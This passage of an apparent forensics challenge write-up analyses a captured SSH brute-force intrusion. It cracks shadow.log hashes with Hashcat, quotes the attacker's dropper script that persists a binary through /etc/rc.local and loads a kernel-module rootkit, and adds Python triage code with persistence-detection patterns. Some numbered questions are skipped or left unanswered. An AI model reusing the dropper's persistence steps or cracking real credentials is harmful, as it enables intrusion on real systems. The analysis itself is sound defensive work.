5. We can see that there is a total of 54 attempts to establish an SSH session, with only two being successful, based on the bytes sent from the server (B) to the client (A). This means that there were 52 failed attempts to establish an SSH session.

6. What credentials (username:password) were used to gain access? Refer to shadow.log and sudoers.log.

As part of the challenge, we received shadow.log and sudoers.log files. I used a tool called Hashcat to crack the hashes from shadow.log and was able to recover two passwords:

hashcat64.exe -m 1800 -a 0 hash.txt rockyou.txt -o cracked.txt

manager:forgot
sean:spectre

[screenshot: Hashcat output]

7. What other credentials (username:password) could have been used to gain access and also have SUDO privileges? Refer to shadow.log and sudoers.log.

What is the tool used to download malicious files on the system?

Based on our earlier findings, we know that the only other protocol present apart from SSH is HTTP. I filtered for HTTP traffic as seen below:

[screenshot: Wireshark HTTP filter]

I can export all three files and save them to my local machine. Reviewing each file, I can see that the first two files are ELF binaries and the third file is a script:

$ file malware-1 malware-2 malware-3
malware-1: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, no section header
malware-2: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID=21064e0e38e436aa28aecd2612f20205977b3826, with debug_info, not stripped
malware-3: Bourne-Again shell script, ASCII text executable

Looking at the contents of the third file (i.e. malware-3), I can see that the file named 1 (i.e. malware-1) is the main malware file:

#!/bin/bash
mv 1 /var/mail/mail
chmod +x /var/mail/mail
echo -e "/var/mail/mail &\nsleep 1\npidof mail > /proc/dmesg\nexit 0" > /etc/rc.local
nohup /var/mail/mail > /dev/null 2>&1&
mv 2 /lib/modules/`uname -r`/sysmod.ko
depmod -a
echo "sysmod" > /etc/modules
modprobe sysmod
sleep 1
pidof mail > /proc/dmesg
rm 3

10. I can then check the MD5 hash for all three files and get the hash for the main malware file:

$ md5sum malware-1 malware-2 malware-3
772b620736b760c1d736b1e6ba2f885b  malware-1
2f41df5a12a1f64e47dede21f1c47326  malware-2
dadbb7fe0577d016bb825d3c59dc3715  malware-3

11. What file has the script modified so the malware will start upon reboot?

If we refer to the contents of the bash script seen earlier, we can note that the echo command is used to add a new command to the "/etc/rc.local" script:

echo -e "/var/mail/mail &\nsleep 1\npidof mail > /proc/dmesg\nexit 0" > /etc/rc.local

This script is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel, and can be used to start custom services.
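The SSH count in question 5 above rests on one rule: a completed SSH session moves far more bytes from the server (B) back to the client (A) than an attempt that was rejected during authentication. The following script is an added example, not part of the original write-up, that applies that rule to a Wireshark conversation export so the count can be reproduced without clicking through the GUI. Everything in it is constructed: the CSV layout approximates the Statistics > Conversations > TCP "Copy as CSV" output, the rows are invented, and MIN_SERVER_BYTES is an assumed cut-off rather than a value taken from the challenge capture.

```python
"""Count failed vs. successful SSH sessions from a Wireshark conversation export.

Added example, not part of the original write-up. The client is side A and
the SSH server is side B, the same convention the write-up uses, so the bytes
the server sent are the "Bytes B -> A" column.
"""
import csv
import io

# Constructed sample: five SSH conversations (two completed, three rejected)
# plus one HTTP conversation that the SSH filter must ignore. The column
# names approximate Wireshark's TCP conversation export (assumption).
SAMPLE_CSV = """\
Address A,Port A,Address B,Port B,Packets,Bytes,Packets A -> B,Bytes A -> B,Packets B -> A,Bytes B -> A
10.0.0.5,51000,10.0.0.9,22,14,2100,7,1000,7,1100
10.0.0.5,51001,10.0.0.9,22,12,1900,6,900,6,1000
10.0.0.5,51002,10.0.0.9,22,420,61000,210,20000,210,41000
10.0.0.7,51003,10.0.0.9,22,13,2000,7,950,6,1050
10.0.0.5,51004,10.0.0.9,22,380,55000,190,18000,190,37000
10.0.0.5,51005,10.0.0.9,80,9,3000,4,400,5,2600
"""

# Assumed cut-off: a rejected SSH attempt still exchanges banners and key
# material (a few KB), while a session that reached a shell goes well beyond.
MIN_SERVER_BYTES = 5000

INT_COLUMNS = ("Port A", "Port B", "Packets", "Bytes",
               "Packets A -> B", "Bytes A -> B",
               "Packets B -> A", "Bytes B -> A")


def parse_conversations(text):
    """Parse the CSV export into dicts with integer byte/packet counts."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        for key in INT_COLUMNS:
            row[key] = int(row[key])
        rows.append(row)
    return rows


def classify_ssh(rows, server_port=22, min_server_bytes=MIN_SERVER_BYTES):
    """Split conversations to the SSH port into successful and failed attempts."""
    ssh = [r for r in rows if r["Port B"] == server_port]
    successful = [r for r in ssh if r["Bytes B -> A"] >= min_server_bytes]
    failed = [r for r in ssh if r["Bytes B -> A"] < min_server_bytes]
    return {
        "total": len(ssh),
        "successful": len(successful),
        "failed": len(failed),
        # Distinct source addresses that tried to log in.
        "clients": sorted({r["Address A"] for r in ssh}),
        # Client ports of the sessions worth following in the pcap.
        "successful_ports": sorted(r["Port A"] for r in successful),
    }


def summarize(text=SAMPLE_CSV):
    """Convenience wrapper: parse and classify in one call."""
    return classify_ssh(parse_conversations(text))


if __name__ == "__main__":
    result = summarize()
    print(f"SSH attempts: {result['total']}, successful: {result['successful']}, "
          f"failed: {result['failed']}, clients: {', '.join(result['clients'])}")
```

The threshold is deliberately a parameter: on a real capture, sort the SSH conversations by "Bytes B -> A" first and pick the gap between the cluster of rejected attempts and the sessions that carried a shell, then rerun classify_ssh with that value.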
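The triage of the three exported files above is three manual steps: classify each file with `file`, hash it with `md5sum`, and read the dropper for the persistence it sets up (the write to /etc/rc.local and the kernel module registered in /etc/modules). The script below is an added example, not part of the original write-up, that scripts the same three checks so they can be run over a directory of exports. The ELF headers for malware-1 and malware-2 are constructed stand-ins (only the class, endianness and e_type fields are decoded, enough to tell the executable from the relocatable kernel module); the malware-3 content is the dropper quoted in the write-up; PERSISTENCE_PATTERNS, fake_elf, triage and triage_all are my own names, and the pattern list is an illustrative set of indicators, not a signature from the challenge.

```python
"""Static triage of exported files: type, hashes, persistence indicators.

Added example, not part of the original write-up.
"""
import hashlib
import re
import struct

ELF_TYPES = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core"}

# Indicators a defender looks for in a dropper (assumed list, not a signature).
PERSISTENCE_PATTERNS = [
    (re.compile(r">\s*/etc/rc\.local\b"), "writes /etc/rc.local (runs at boot)"),
    (re.compile(r">\s*/etc/modules\b"), "adds module to /etc/modules (loaded at boot)"),
    (re.compile(r"/lib/modules/"), "drops file into the kernel module tree"),
    (re.compile(r"\b(modprobe|insmod)\b"), "loads a kernel module immediately"),
    (re.compile(r"\bnohup\b"), "detaches a process from the login session"),
    (re.compile(r"\brm\s+"), "removes files (cleanup of the dropper)"),
]


def describe(data):
    """Approximate the `file` verdicts used in the write-up for ELF and scripts."""
    if data[:4] == b"\x7fELF" and len(data) >= 20:
        bits = {1: "32-bit", 2: "64-bit"}.get(data[4], "unknown-class")
        endian, fmt = ("LSB", "<H") if data[5] == 1 else ("MSB", ">H")
        (e_type,) = struct.unpack_from(fmt, data, 16)  # e_type sits at offset 16
        return f"ELF {bits} {endian} {ELF_TYPES.get(e_type, 'unknown type')}"
    if data.startswith(b"#!"):
        interp = data.split(b"\n", 1)[0][2:].strip().decode("ascii", "replace")
        return f"script ({interp})"
    return "data"


def persistence_indicators(text):
    """Return the label of every persistence pattern found in a script."""
    return [label for pattern, label in PERSISTENCE_PATTERNS if pattern.search(text)]


def triage(name, data):
    """Build one triage record: type, MD5/SHA-256, and indicators for scripts."""
    record = {
        "name": name,
        "kind": describe(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "indicators": [],
    }
    if record["kind"].startswith("script"):
        record["indicators"] = persistence_indicators(data.decode("utf-8", "replace"))
    return record


def fake_elf(e_type):
    """Constructed 64-byte ELF64 little-endian header with the given e_type."""
    ident = b"\x7fELF" + bytes([2, 1, 1]) + b"\x00" * 9          # class 64, LSB, v1
    return ident + struct.pack("<HH", e_type, 0x3E) + b"\x00" * 44  # e_type, x86-64


# Sample inputs: two constructed ELF headers standing in for malware-1/2, and
# the dropper script quoted in the write-up as malware-3.
SAMPLES = {
    "malware-1": fake_elf(2),
    "malware-2": fake_elf(1),
    "malware-3": b"""#!/bin/bash
mv 1 /var/mail/mail
chmod +x /var/mail/mail
echo -e "/var/mail/mail &\\nsleep 1\\npidof mail > /proc/dmesg\\nexit 0" > /etc/rc.local
nohup /var/mail/mail > /dev/null 2>&1&
mv 2 /lib/modules/`uname -r`/sysmod.ko
depmod -a
echo "sysmod" > /etc/modules
modprobe sysmod
sleep 1
pidof mail > /proc/dmesg
rm 3
""",
}


def triage_all(samples=SAMPLES):
    """Triage every sample and return the records keyed by file name."""
    return {name: triage(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for rec in triage_all().values():
        print(f"{rec['name']}: {rec['kind']}  md5={rec['md5']}")
        for hit in rec["indicators"]:
            print(f"    - {hit}")
```

For real exports, replace SAMPLES with the files read from disk; the hashes then match `md5sum` byte for byte, and the indicator list gives a quick answer to the "what did it change to survive a reboot" question before reading the script by hand.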